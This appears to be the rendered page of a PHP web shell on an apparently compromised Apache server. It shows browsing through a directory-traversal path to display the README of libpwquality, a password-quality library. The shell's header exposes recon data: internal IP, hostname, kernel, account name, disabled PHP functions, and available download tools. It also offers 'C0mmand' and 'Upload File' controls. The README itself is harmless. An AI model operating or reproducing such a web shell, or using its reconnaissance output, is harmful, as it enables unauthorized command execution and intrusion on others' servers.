Server IP : 192.168.23.10 / Your IP : 3.147.76.250 Web Server : Apache System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64 User : rrrallyteam ( 1049) PHP Version : 8.1.31 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /home/../usr/share/doc/openssl/../libnfnetlink/../libpwquality/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
This is a libpwquality library for password quality checking and generation of random passwords that pass the checks. NOTES: This library uses the cracklib as a dependency. See the pwquality.h header file for the API. There are simple tools that use the libpwquality: pwscore - reads the password to be checked from the standard input Optional argument is an user name for additional checks. pwmake - generates a random password Required argument is number of bits of entropy used to generate the password. The pwquality Python wrapper module can be used to call the libpwquality functionality from Python. And finally there is pam_pwquality Linux PAM module that can be used instead of pam_cracklib to disallow weak new passwords when user's login password is changed.